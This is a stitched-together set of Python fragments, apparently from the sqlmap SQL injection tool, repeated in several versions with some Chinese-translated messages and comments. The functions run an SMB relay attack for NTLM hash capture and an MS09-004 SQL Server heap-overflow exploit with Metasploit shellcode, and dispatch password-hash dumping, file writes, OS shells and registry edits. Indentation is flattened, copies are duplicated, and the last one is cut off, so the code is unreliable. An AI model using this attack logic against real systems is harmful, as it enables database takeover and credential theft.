def osSmb(self): self.checkDbmsOs() if not Backend.isOs(OS.WINDOWS): errMsg = "the back-end DBMS underlying operating system is " errMsg += "not Windows: it is not possible to perform the SMB " errMsg += "relay attack" raise SqlmapUnsupportedDBMSException(errMsg) if not isTechniqueAvailable( PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL): errMsg = "on this back-end DBMS it is only possible to " errMsg += "perform the SMB relay attack if stacked " errMsg += "queries are supported" raise SqlmapUnsupportedDBMSException(errMsg) elif Backend.isDbms(DBMS.MYSQL): debugMsg = "since stacked queries are not supported, " debugMsg += "sqlmap is going to perform the SMB relay " debugMsg += "attack via inference blind SQL injection" logger.debug(debugMsg) printWarn = True warnMsg = "it is unlikely that this attack will be successful " if Backend.isDbms(DBMS.MYSQL): warnMsg += "because by default MySQL on Windows runs as " warnMsg += "Local System which is not a real user, it does " warnMsg += "not send the NTLM session hash when connecting to " warnMsg += "a SMB service" elif Backend.isDbms(DBMS.PGSQL): warnMsg += "because by default PostgreSQL on Windows runs " warnMsg += "as postgres user which is a real user of the " warnMsg += "system, but not within the Administrators group" elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin( ("2005", "2008")): warnMsg += "because often Microsoft SQL Server %s " % Backend.getVersion( ) warnMsg += "runs as Network Service which is not a real user, " warnMsg += "it does not send the NTLM session hash when " warnMsg += "connecting to a SMB service" else: printWarn = False if printWarn: logger.warn(warnMsg) self.smb()
def osBof(self): if not isStackingAvailable() and not conf.direct: return if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin( ("2000", "2005")): errMsg = "the back-end DBMS must be Microsoft SQL Server " errMsg += "2000 or 2005 to be able to exploit the heap-based " errMsg += "buffer overflow in the 'sp_replwritetovarbin' " errMsg += "stored procedure (MS09-004)" raise SqlmapUnsupportedDBMSException(errMsg) infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion( ) infoMsg += "'sp_replwritetovarbin' stored procedure heap-based " infoMsg += "buffer overflow (MS09-004)" logger.info(infoMsg) msg = "this technique is likely to DoS the DBMS process, are you " msg += "sure that you want to carry with the exploit? [y/N] " inp = readInput(msg, default="N") if inp and inp[0].lower() == "y": dos = True else: dos = False if dos: self.initEnv(mandatory=False, detailed=True) self.getRemoteTempPath() self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) self.bof()
def action(): """ This function exploit the SQL injection on the affected URL parameter and extract requested data from the back-end database management system or operating system if possible """ # First of all we have to identify the back-end database management # system to be able to go ahead with the injection setHandler() if not Backend.getDbms() or not conf.dbmsHandler: htmlParsed = Format.getErrorParsedDBMSes() errMsg = "sqlmap was not able to fingerprint the " errMsg += "back-end database management system" if htmlParsed: errMsg += ", but from the HTML error page it was " errMsg += "possible to determinate that the " errMsg += "back-end DBMS is %s" % htmlParsed if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS: errMsg += ". Do not specify the back-end DBMS manually, " errMsg += "sqlmap will fingerprint the DBMS for you" elif kb.nullConnection: errMsg += ". You can try to rerun without using optimization " errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection") raise SqlmapUnsupportedDBMSException(errMsg) conf.dumper.singleString(conf.dbmsHandler.getFingerprint()) # Enumeration options if conf.getBanner: conf.dumper.banner(conf.dbmsHandler.getBanner()) if conf.getCurrentUser: conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser()) if conf.getCurrentDb: conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb()) if conf.getHostname: conf.dumper.hostname(conf.dbmsHandler.getHostname()) if conf.isDba: conf.dumper.dba(conf.dbmsHandler.isDba()) if conf.getUsers: conf.dumper.users(conf.dbmsHandler.getUsers()) if conf.getPasswordHashes: try: conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS) except SqlmapNoneDataException, ex: logger.critical(ex) except:
def _regInit(self): if not isStackingAvailable() and not conf.direct: return self.checkDbmsOs() if not Backend.isOs(OS.WINDOWS): errMsg = "后端DBMS底层操作系统不是Windows" raise SqlmapUnsupportedDBMSException(errMsg) self.initEnv() self.getRemoteTempPath()
def _regInit(self): if not isStackingAvailable() and not conf.direct: return self.checkDbmsOs() if not Backend.isOs(OS.WINDOWS): errMsg = "the back-end DBMS underlying operating system is " errMsg += "not Windows" raise SqlmapUnsupportedDBMSException(errMsg) self.initEnv() self.getRemoteTempPath()
def osSmb(self): self.checkDbmsOs() if not Backend.isOs(OS.WINDOWS): errMsg = "后端DBMS底层操作系统不是Windows:不可能执行SMB中继攻击" raise SqlmapUnsupportedDBMSException(errMsg) if not isStackingAvailable() and not conf.direct: if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL): errMsg = "在这个后端DBMS中,只有支持堆叠(多语句)查询才可能执行SMB中继攻击" raise SqlmapUnsupportedDBMSException(errMsg) elif Backend.isDbms(DBMS.MYSQL): debugMsg = "由于不支持堆叠查询,sqlmap将通过推测SQL盲注入执行SMB中继攻击" logger.debug(debugMsg) printWarn = True warnMsg = "这次攻击不太可能成功 " if Backend.isDbms(DBMS.MYSQL): warnMsg += "因为默认情况下,MySQL在Windows上运行的本地系统不是真正的用户,它在连接到SMB服务时不会发送NTLM会话哈希session hash" elif Backend.isDbms(DBMS.PGSQL): warnMsg += "因为默认情况下PostgreSQL作为postgres用户运行,该用户是系统的真正用户,但不在Administrators组内" elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin( ("2005", "2008")): warnMsg += "因为通常Microsoft SQL Server %s 作为网络服务运行,而不是真正的用户,它在连接到SMB服务时不发送NTLM会话哈希" % Backend.getVersion( ) else: printWarn = False if printWarn: logger.warn(warnMsg) self.smb()
def osBof(self): if not isStackingAvailable() and not conf.direct: return if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin( ("2000", "2005")): errMsg = "后端DBMS必须是Microsoft SQL Server 2000或2005才能够利用“sp_replwritetovarbin”存储过程(MS09-004)中基于堆的缓冲区溢出" raise SqlmapUnsupportedDBMSException(errMsg) infoMsg = "将利用Microsoft SQL Server %s“sp_replwritetovarbin”存储过程基于堆的缓冲区溢出(MS09-004)" logger.info(infoMsg) msg = "这种技术很可能是DoS的DBMS过程,你确定要利用这个漏洞? [y/N] " if readInput(msg, default='N', boolean=True): self.initEnv(mandatory=False, detailed=True) self.getRemoteTempPath() self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) self.bof()
def action(): """ This function exploit the SQL injection on the affected URL parameter and extract requested data from the back-end database management system or operating system if possible """ # First of all we have to identify the back-end database management # system to be able to go ahead with the injection setHandler() if not Backend.getDbms() or not conf.dbmsHandler: htmlParsed = Format.getErrorParsedDBMSes() errMsg = "sqlmap was not able to fingerprint the " errMsg += "back-end database management system" if htmlParsed: errMsg += ", but from the HTML error page it was " errMsg += "possible to determinate that the " errMsg += "back-end DBMS is %s" % htmlParsed if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS: errMsg += ". Do not specify the back-end DBMS manually, " errMsg += "sqlmap will fingerprint the DBMS for you" elif kb.nullConnection: errMsg += ". You can try to rerun without using optimization " errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection") raise SqlmapUnsupportedDBMSException(errMsg) conf.dumper.singleString(conf.dbmsHandler.getFingerprint()) # Enumeration options if conf.getBanner: conf.dumper.banner(conf.dbmsHandler.getBanner()) if conf.getCurrentUser: conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser()) if conf.getCurrentDb: conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb()) if conf.getHostname: conf.dumper.hostname(conf.dbmsHandler.getHostname()) if conf.isDba: conf.dumper.dba(conf.dbmsHandler.isDba()) if conf.getUsers: conf.dumper.users(conf.dbmsHandler.getUsers()) if conf.getStatements: conf.dumper.statements(conf.dbmsHandler.getStatements()) if conf.getPasswordHashes: try: conf.dumper.userSettings( "database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS) except SqlmapNoneDataException as ex: logger.critical(ex) except: raise if conf.getPrivileges: try: conf.dumper.userSettings( "database management system users privileges", conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES) except SqlmapNoneDataException as ex: logger.critical(ex) except: raise if conf.getRoles: try: conf.dumper.userSettings("database management system users roles", conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES) except SqlmapNoneDataException as ex: logger.critical(ex) except: raise if conf.getDbs: try: conf.dumper.dbs(conf.dbmsHandler.getDbs()) except SqlmapNoneDataException as ex: logger.critical(ex) except: raise if conf.getTables: try: conf.dumper.dbTables(conf.dbmsHandler.getTables()) except SqlmapNoneDataException as ex: logger.critical(ex) except: raise if conf.commonTables: try: conf.dumper.dbTables(tableExists(paths.COMMON_TABLES)) except SqlmapNoneDataException as ex: logger.critical(ex) except: raise if conf.getSchema: try: conf.dumper.dbTableColumns(conf.dbmsHandler.getSchema(), CONTENT_TYPE.SCHEMA) except SqlmapNoneDataException as ex: logger.critical(ex) except: raise if conf.getColumns: try: conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns(), CONTENT_TYPE.COLUMNS) except SqlmapNoneDataException as ex: logger.critical(ex) except: raise if conf.getCount: try: conf.dumper.dbTablesCount(conf.dbmsHandler.getCount()) except SqlmapNoneDataException as ex: logger.critical(ex) except: raise if conf.commonColumns: try: conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS)) except SqlmapNoneDataException as ex: logger.critical(ex) except: raise if conf.dumpTable: try: conf.dbmsHandler.dumpTable() except SqlmapNoneDataException as ex: logger.critical(ex) except: raise if conf.dumpAll: try: conf.dbmsHandler.dumpAll() except SqlmapNoneDataException as ex: logger.critical(ex) except: raise if conf.search: try: conf.dbmsHandler.search() except SqlmapNoneDataException as ex: logger.critical(ex) except: raise if conf.sqlQuery: for query in conf.sqlQuery.strip(';').split(';'): query = query.strip() if query: conf.dumper.sqlQuery(query, conf.dbmsHandler.sqlQuery(query)) if conf.sqlShell: conf.dbmsHandler.sqlShell() if conf.sqlFile: conf.dbmsHandler.sqlFile() # User-defined function options if conf.udfInject: conf.dbmsHandler.udfInjectCustom() # File system options if conf.fileRead: conf.dumper.rFile(conf.dbmsHandler.readFile(conf.fileRead)) if conf.fileWrite: conf.dbmsHandler.writeFile(conf.fileWrite, conf.fileDest, conf.fileWriteType) if conf.commonFiles: try: conf.dumper.rFile(fileExists(paths.COMMON_FILES)) except SqlmapNoneDataException as ex: logger.critical(ex) except: raise # Operating system options if conf.osCmd: conf.dbmsHandler.osCmd() if conf.osShell: conf.dbmsHandler.osShell() if conf.osPwn: conf.dbmsHandler.osPwn() if conf.osSmb: conf.dbmsHandler.osSmb() if conf.osBof: conf.dbmsHandler.osBof() # Windows registry options if conf.regRead: conf.dumper.registerValue(conf.dbmsHandler.regRead()) if conf.regAdd: conf.dbmsHandler.regAdd() if conf.regDel: conf.dbmsHandler.regDel() # Miscellaneous options if conf.cleanup: conf.dbmsHandler.cleanup() if conf.direct: conf.dbmsConnector.close()
def action(): """ This function exploit the SQL injection on the affected URL parameter and extract requested data from the back-end database management system or operating system if possible。如果可能的话,这个函数利用SQL注入的影响请求URL参数和提取数据从后端数据库管理系统或操作系统, """ #action()是很总要的一个函数,该函数主要根据攻城师的命令行参数选型,从而利用存在注入漏洞的url,以进一步获取攻城师要获取的数据。比如:当前的数据库用户、枚举数据库的所有数据表等等 # First of all we have to identify the back-end database management # system to be able to go ahead with the injection 首先我们必须确定后端数据库管理系统能够继续注入 setHandler() # hander.py 检测目标web应用程序的后端数据库管理系统 if not Backend.getDbms() or not conf.dbmsHandler: htmlParsed = Format.getErrorParsedDBMSes() errMsg = "sqlmap was not able to fingerprint the " errMsg += "back-end database management system" #sqlmap无法指纹后端数据库管理系统 if htmlParsed: errMsg += ", but from the HTML error page it was " errMsg += "possible to determinate that the " errMsg += "back-end DBMS is %s" % htmlParsed #但从HTML错误页面可以定后端数据库管理系统 if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS: errMsg += ". Do not specify the back-end DBMS manually, " errMsg += "sqlmap will fingerprint the DBMS for you" #没有指定后端手动DBMS,sqlmap将指纹DBMS吗 elif kb.nullConnection: errMsg += ". You can try to rerun without using optimization " #你可以尝试重新运行不使用优化开关 errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection") else: errMsg += ". Support for this DBMS will be implemented at " errMsg += "some point" #支持该DBMS将在某种程度上实现 raise SqlmapUnsupportedDBMSException(errMsg) conf.dumper.singleString(conf.dbmsHandler.getFingerprint()) # Enumeration options 枚举选项 if conf.getBanner: conf.dumper.banner(conf.dbmsHandler.getBanner()) if conf.getCurrentUser: conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser()) if conf.getCurrentDb: conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb()) if conf.getHostname: conf.dumper.hostname(conf.dbmsHandler.getHostname()) if conf.isDba: conf.dumper.dba(conf.dbmsHandler.isDba()) if conf.getUsers: conf.dumper.users(conf.dbmsHandler.getUsers()) if conf.getPasswordHashes: try: conf.dumper.userSettings( "database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS) except SqlmapNoneDataException, ex: logger.critical(ex) except: